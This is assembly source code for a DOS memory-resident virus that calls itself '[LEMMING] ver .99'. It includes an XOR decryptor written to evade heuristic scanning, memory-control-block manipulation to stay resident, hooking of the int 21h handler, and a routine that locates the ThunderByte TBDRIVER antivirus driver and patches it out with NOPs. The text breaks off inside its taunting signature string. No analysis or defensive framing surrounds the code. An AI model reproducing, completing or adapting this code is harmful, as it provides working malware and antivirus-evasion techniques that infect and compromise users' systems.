.286
.model tiny
.code
virus_size equ vir_end - start
virus_siz equ virus_size + virus_size
decrypt_size equ handle - next_function
data_size equ vir_end - step1
engine_size equ next_function - start
Int21_base equ 021h*4
timer_seg equ 01ch*4+2
virus_paragraphs equ virus_size * 2/16
code segment
assume cs:code,ds:code,es:code
progr equ 0100h
org progr
main:
start:
mov cx,decrypt_size
lea si,next_function
call ofset
ofset: pop bp
sub bp,109h ;Set postion of base pointer
decrypt:
xor byte ptr cs:[si][bp],00 ;Anti heuristic decryptor
key: ;will fool Thunderbyte.
jcxz next_function
dec cx
inc si
jmp decrypt
fooled_tbav:
next_function:
push es
push ds
push cs
pop ds
call getcpu ;Detect CPU
je _8086
mov ax,0fffeh ;Determine if installed
int 21h
cmp bx,0ffffh ;Returns ffff in bx if so...
test_processor:
jne install__
_8086: jmp end_install ;Not 80286 compatible
transfer:
call get_int21
mov di,0100h
push cs
pop ds
lea si,word ptr cs:start[bp]
mov cx,virus_size
move:
rep movsb ;Move virus and make resident
copied:
call set_int21 ;Set int 21 to virus
jmp end_install
install__ proc near
push ds es
call anti_av ;Detect the presence of TBDRIVER
pop es ds ;and patch
mov ax,5802h ;are umb's available?
int 21h
jc install_low ;no then install in low memory
mov ax,5803h ;Chain mcb's into low memory
mov bx,1
int 21h
jc install_low
push es ;get current mcb
pop dx
dec dx
mov di,3 ;add to current mcb to get
;pointer to next mcb
walk: mov es,dx
cmp byte ptr es:[di-3],05ah
je lastmcb
add dx,word ptr es:di
inc dx ;search for last mcb.
mov es,dx
cmp byte ptr es:[di-3],05ah
jne walk
lastmcb:
mov ax,5803h ;remove umb link
xor bx,bx
int 21h
cmp word ptr es:[di],virus_paragraphs
ja hi_install ;Enough memory for UMB install?
push cs
pop es
jmp install_low
hi_install:
inc dx
mov es,dx ;es points to virus new CS
install_low:
push es
xor di,di
push es ;original psp segment
pop dx
dec dx
mov es,dx
cmp byte ptr es:[di],5ah
jne end_install
mov ax,virus_siz
mov cl,4
shr ax,cl
inc ax
inc ax
sub word ptr es:[di+3],ax ;
mov ax,word ptr es:[di+3] ;copy last mcb size into ax
pop cx
add cx,ax ;new segment
sub cx,10h
mov word ptr cs:new_seg[bp],cx
mov es,cx
jmp transfer ;go and move virus to new
;memory position
install__ endp
end_install:
pop ds
pop es
lea di,word ptr cs:buffer1[bp]
mov ax,05a4dh
cmp word ptr cs:[di],ax
jne goto_com
mov ax,word ptr cs:[di+16h]
push es
pop bx
add bx,10h
add ax,bx ;code segment
mov cx,word ptr cs:[di+0eh] ;get original ss
mov dx,word ptr cs:[di+10h] ;get original sp
add cx,bx
cli
mov ss,cx ;restore original ss and sp
mov sp,dx
sti
push ax
mov bx,word ptr cs:[di+14h] ;get original ip
push bx
call clear_reg ;clear all registers
retf ;and hand back control
goto_com:
cld
lea si,buffer1[bp] ;restore com entry point
mov di,0100h
mov cx,18h
rep movsb
push 0100h
call clear_reg
ret ;hand back control
clear_reg:
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp
ret
anti_av proc near
; DISABLE TBDRIVER AGAINST TUNNELING DETECT
mov ax,5200h
int 21h ;es:bx
add bx,22h ;pointer to first device 'NUL'
;or 'CON'
next_search:
cld
lds si,word ptr es:bx
cmp si,-1
je not_found
push ds cs
pop es
lea di,scan[bp]
push si
add si,10 ;device name offset
;from bx pointer
mov cx,5
rep cmpsb ;search for device name
pop bx es
jne next_search
found: ;If TBDRIVER is found then
push ds ;patch against tunneling
pop es
push cs
pop ds
mov di,bx
xor ax,ax
lea si,scan_string[bp]
next_char:
inc ax
mov cx,5
push si
rep cmpsb ;search for string
pop si
je bullseye
cmp ax,10116
je not_found
jmp next_char
bullseye:
mov es:[di-12],09090h ;disable tbdriver
not_found:
ret
scan db 'TBDRV'
scan_string db 0fah,09ch,0fch,053h,050h
anti_av endp
VirName db 0dh,0ah,'The Rise and Fall of ThunderByte-1994-Australia.',0dh,0ah
db ' You Will Never Trust Anti-Virus Software Again!! ',0dh,0ah
db '[LEMMING] ver .99